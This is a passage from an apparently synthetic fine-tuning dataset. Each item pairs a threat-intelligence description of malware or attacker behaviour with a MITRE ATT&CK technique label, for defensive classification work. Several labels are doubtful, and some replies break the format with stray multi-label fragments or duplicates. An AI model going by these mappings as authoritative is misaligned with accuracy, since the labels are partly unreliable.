Technique\". " }, { "role": "user", "content": "PUNCHBUGGY can establish using a AppCertDLLs Registry key." }, { "role": "assistant", "content": "T1546.009 - Event Triggered Execution: AppCert DLLs" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dragonfly has manipulated .lnk files to gather user credentials in conjunction with Forced Authentication." }, { "role": "assistant", "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "malware can download additional files from C2 servers." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "runs the ifconfig command to obtain the IP address from the victim’s machine." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can upload files from compromised hosts." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Trojan downloads the contents of this file by crafting an HTTP request to a URL structured as follows: + + “?alt=media” With the contents of the file downloaded, the Trojan sets the modification_time variable to the current modification time so the Trojan knows when the actor makes further changes to the file" }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp', 'T1083 - File and Directory Discovery', 'T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Certutil is a living-off the land command line utility that can be used to obtain certificate authority information and configure certificate services. Threat actors usually utilize certutil to download remote files from a given URL. It also incorporates a built-in function to decode base64-encoded files" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "attempts to exploit privilege escalation vulnerabilities CVE-2010-0232 or CVE-2010-4398." }, { "role": "assistant", "content": "T1068 - Exploitation for Privilege Escalation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BUBBLEWRAP can communicate using HTTP or HTTPS." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KONNI has used the command \"cmd /c tasklist\" to get a snapshot of the current processes on the target machine." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RDFSNIFFER hooks several Win32 API functions to hijack elements of the remote system management user-interface." }, { "role": "assistant", "content": "T1056.004 - Input Capture: Credential API Hooking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Apply the Microsoft security updates for MS17-010, including the updates for the Windows XP and Windows Server 2003 legacy operating systems. Disable SMBv1 on systems where it is not necessary (e.g. hosts that do not need to communicate with Windows XP and Windows 2000 systems). Carefully evaluate the need for allowing SMBv1-capable systems on interconnected networks compared to the associated risks. Scan networks for the presence of the DoublePulsar backdoor using plugins for tools such as Nmap. Use network auditing tools to scan networks for hosts that are vulnerable to the vulnerabilities described in MS17-010. Implement a backup strategy that includes storing data using offline backup media. Backups to locally connected, network-attached, or cloud-based storage are often insufficient because ransomware frequently accesses and encrypts files stored on these systems" }, { "role": "assistant", "content": "T1490 - Inhibit System Recovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "If the user does not have permissions to add a service, the installation routine attempts to add persistence by creating the following registry key that will run the functional code within Emissary via an exported function named \"DllRegister" }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HOLMIUM has been observed using various vectors for initial access, including spear-phishing email, sometimes carrying archive attachments that exploit the CVE-2018-20250 vulnerability in WinRAR, and password-spraying. Many of their recent attacks, however, have involved the penetration testing tool Ruler used in tandem with compromised Exchange credentials" }, { "role": "assistant", "content": "T1110.003 - Brute Force: Password Spraying" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Naid creates a new service to establish." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NETWIRE can discover and close windows on controlled systems." }, { "role": "assistant", "content": "T1010 - Application Window Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used a keylogging tool called KEYPUNCH." }, { "role": "assistant", "content": "T1056 - Input Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "compromised three Japanese websites using a Flash exploit to perform watering hole attacks." }, { "role": "assistant", "content": "T1189 - Drive-by Compromise" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Passgrabber module – collects logins and passwords from various sources: Firefox and Chrome files, Microsoft Vault storage, etc. Instead of using Mimikatz as in previous versions, the module collects passwords using its own algorithms" }, { "role": "assistant", "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses the ipconfig command." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Shamoon attempts to access the \"ADMIN$\", \"C$\\Windows\", \"D$\\Windows\", and \"E$\\Windows\" shares on the victim with its current privileges." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Uploads a file on the victim’s computer to the C&C server" }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has built in commands to identify a host’s IP address and find out other network configuration settings by viewing connected sessions." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A modified EternalBlue exploit, also used by WannaCry.. The EternalRomance exploit – a remote code execution exploit targeting Windows XP to Windows 2008 systems over TCP port 445 (Note: patched with MS17-010).. An attack against the update mechanism of a third-party Ukrainian software product called MeDoc." }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ramsay can spread itself by infecting other portable executable files on removable drives." }, { "role": "assistant", "content": "T1091 - Replication Through Removable Media" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Tomiris can upload files matching a hardcoded set of extensions, such as .doc, .docx, .pdf, and .rar, to its C2 server." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TYPEFRAME can uninstall malware components using a batch script. TYPEFRAME can execute commands using a shell." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GravityRAT uses the \"netstat\" command to find open ports on the victim’s machine." }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Earth Lusca has compromised victims by directly exploiting vulnerabilities of public-facing servers, including those associated with Microsoft Exchange and Oracle GlassFish." }, { "role": "assistant", "content": "T1190 - Exploit Public-Facing Application" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Once executed, Vcrodat loads an encrypted payload on to the victim’s computer." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Conti ransomware deletes Windows Volume Shadow Copies using vssadmin." }, { "role": "assistant", "content": "T1490 - Inhibit System Recovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "launches a scheduled task." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Even simple API calls were obfuscated, and instead of just calling the functions, Siloscape made the effort to use the Native API (NTAPI) version of the same function" }, { "role": "assistant", "content": "T1106 - Native API', 'T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FlawedAmmyy can collect clipboard data." }, { "role": "assistant", "content": "T1115 - Clipboard Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dtrack has used a dropper that embeds an encrypted payload as extra data." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information', 'T1027.009 - Embedded Payloads" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Strike can produce a sessions report from compromised hosts." }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KGH_SPY can collect credentials from WINSCP." }, { "role": "assistant", "content": "T1555 - Credentials from Password Stores" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The tokens for each platform are hardcoded within the sample:November 2016 to January 2017: \"Evil New Year\" CampaignIn the early part of 2017, Group123 started the \"Evil New Year\" campaign" }, { "role": "assistant", "content": "T1134 - Access Token Manipulation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Maze has used the \"WNetOpenEnumW\", \"WNetEnumResourceW”, “WNetCloseEnum” and “WNetAddConnection2W” functions to enumerate the network resources on the infected machine." }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "These commands are also executed when the loadconfig command is issued" }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Revenge RAT collects the IP address and MAC address from the system." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Static analysis of this executable shows only two functions, but a regular number of imports. Upon detecting a debugger attached to it, the malware will display the message below and terminate the execution. This packer also hides the calls to API functions. This time instead of using a dispatcher function, the malware pushes the arguments into the stack as usual but will then perform a call to a jump table built during the unpacking, in the .text section memory region. Each entry finishes with a jmp instruction into the respective API function. Effectively the malware doesn't do any call to API functions, it always performs a jump. The end result is the same has in the packer from 2016, but with a simpler mechanism. One of the anti-analysis features included in this packer is the lack of calls to API functions. In the early stages of execution, the malware loads the libraries and retrieves the addresses from functions it needs. Feature-wise, there is no change when compared with the 2016 version, in fact when compared the C2 beaconing functions even share some of the offsets" }, { "role": "assistant", "content": "T1497.003 - Time Based Evasion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In their advisory published on Jan. 26, 2022, CERT-UA asserted that the initial vector for the malware, dubbed WhisperGate, was either a supply-chain attack or exploitation. The first payload in this infection is responsible for the initial attempt at wiping the systems. The malware executable wipes the master boot record (MBR) and replaces it with the code responsible for displaying the ransom note. Similar to the notorious NotPetya wiper that masqueraded as ransomware during its 2017 campaign, WhisperGate is not intended to be an actual ransom attempt, since the MBR is completely overwritten and has no recovery options. This wiper also tries to destroy the C:\\ partition by overwriting it with fixed data. The additional steps taken to wipe the actual hard drive partition differentiate its behavior from other wiper malware like NotPetya. However, most modern systems today have switched to GUID Partition Table (GPT) from MBR, which allows for larger file systems and has fewer limitations, potentially limiting some of the impacts of this executable" }, { "role": "assistant", "content": "T1542.003 - Bootkit" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WarzoneRAT can include a rootkit to hide processes, files, and startup." }, { "role": "assistant", "content": "T1014 - Rootkit" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Honeybee uses a combination of NTWDBLIB.dll and cliconfg.exe to bypass UAC protections using DLL hijacking." }, { "role": "assistant", "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses the command line and rundll32.exe to execute." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN7 malware has created scheduled tasks to establish persistence." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "As seen with other ransomware cases, Mimikatz is a key player in dumping credentials but LockBit 2.0 has been occasionally seen utilizing MiniDump as well." }, { "role": "assistant", "content": "T1003 - OS Credential Dumping', 'T1003 - OS Credential Dumping" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kimsuky has disguised its C2 addresses as the websites of shopping malls, governments, universities, and others." }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LiteDuke has the ability to discover the proxy configuration of Firefox and/or Opera." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "communicates to its C2 server over HTTP and embeds data within the Cookie HTTP header." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Observed Clop samples try to kill several processes and services related to backups and security solutions. Clop also leverages Code Signing to evade detection" }, { "role": "assistant", "content": "T1489 - Service Stop" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Okrum was seen using modified Quarks PwDump to perform credential dumping." }, { "role": "assistant", "content": "T1003.005 - OS Credential Dumping: Cached Domain Credentials" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "schtasks is used to schedule tasks on a Windows system to run at a specific date and time." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SLOTHFULMEDIA has a keylogging capability." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Emissary has the capability to execute ver and systeminfo commands." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 has used compromised local accounts to access victims' networks." }, { "role": "assistant", "content": "T1078.003 - Valid Accounts: Local Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mis-Type may create a temporary user on the system named `Lost_{Unique Identifier}`." }, { "role": "assistant", "content": "T1136.001 - Create Account: Local Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN8's malicious spearphishing payloads use WMI to launch malware and spawn cmd.exe execution. FIN8 has also used WMIC for lateral movement as well as during and post compromise cleanup activities." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation CuckooBees, the threat actors used the `net time` command as part of their advanced reconnaissance." }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is capable of enumerating and manipulating files and directories." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Details: One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe. Writing an analytic looking for a process of esentutl.exe with Windows\\WebCache in the command line may help you catch this behavior" }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The legitimate DLL that would be used in this case has the size of roughly 600 KB, but here we have an obfuscated library that is over 600 MB. The large size of the file is intended to hamper analysis and detection. Once all empty sections have been removed from the library, the final payload is a binary of 27.5 MB" }, { "role": "assistant", "content": "T1027.001 - Obfuscated Files or Information: Binary Padding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Turian can store copied files in a specific directory prior to exfiltration." }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LookBack has a C2 proxy tool that masquerades as \"GUP.exe\", which is software used by Notepad++." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QakBot can deobfuscate and re-assemble code strings for execution." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Prikormka encrypts some C2 traffic with the Blowfish cipher." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The algorithm used by Dyre for generating the AES and IV from the first 48 bytes of data based on a rehashing scheme was commonly referred to as Dyre’s derive_key function, this function was slightly changed in the new bot" }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses services.exe to register a new autostart service named \"Audit Service\" using a copy of the local lsass.exe file." }, { "role": "assistant", "content": "T1569.002 - System Services: Service Execution', 'T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GoldenSpy can create new users on an infected system." }, { "role": "assistant", "content": "T1136.001 - Create Account: Local Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HotCroissant can perform dynamic DLL importing and API lookups using \"LoadLibrary\" and \"GetProcAddress\" on obfuscated strings." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SILENTTRINITY can enumerate processes, including properties to determine if they have the Common Language Runtime (CLR) loaded." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group malware SierraAlfa accesses the \"ADMIN$\" share via SMB to conduct lateral movement." }, { "role": "assistant", "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PcShare has decrypted its strings by applying a XOR operation and a decompression using a custom implemented LZM algorithm." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In our previous article, we mentioned since this GPON Vulnerability (CVE-2018-10561, CVE-2018-10562 ) announced, there have been at least five botnets family mettle, muhstik, mirai, hajime, satori actively exploit the vulnerability to build their zombie army in just 10 days." }, { "role": "assistant", "content": "T1584.005 - Botnet', 'T1588.006 - Vulnerabilities', 'T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT3 replaces the Sticky Keys binary \"C:\\Windows\\System32\\sethc.exe\" for persistence." }, { "role": "assistant", "content": "T1546.008 - Event Triggered Execution: Accessibility Features" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A Gamaredon Group file stealer can gather the victim's username to send to a C2 server." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Small Sieve can obtain the id of a logged in user." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This time, the text is from the novel \"The Brothers Karamazov\" by Fyodor Dostoevsky (a Russian writer). The malicious document drops a Python interpreter and PoetRAT. The author made a few changes to the PoetRAT malware, though. First, the malware uses pyminifier to obfuscate the Python script and avoid detection based on string or YARA rules: The obfuscation is a base64 and an LZMA compression algorithm. For example, the variables are stored in a \"Constant.py\" file containing the C2 server and the configuration. The most notable change is the protocol used to download and upload files" }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used HTTP requests for command and control." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WindowsDefender.ini – The Base64 encoded and obfuscated PowerShell script" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BISCUIT has a command to periodically take screenshots of the system." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chimera has used Windows admin shares to move laterally." }, { "role": "assistant", "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used HTTP for C2, including sending error codes in 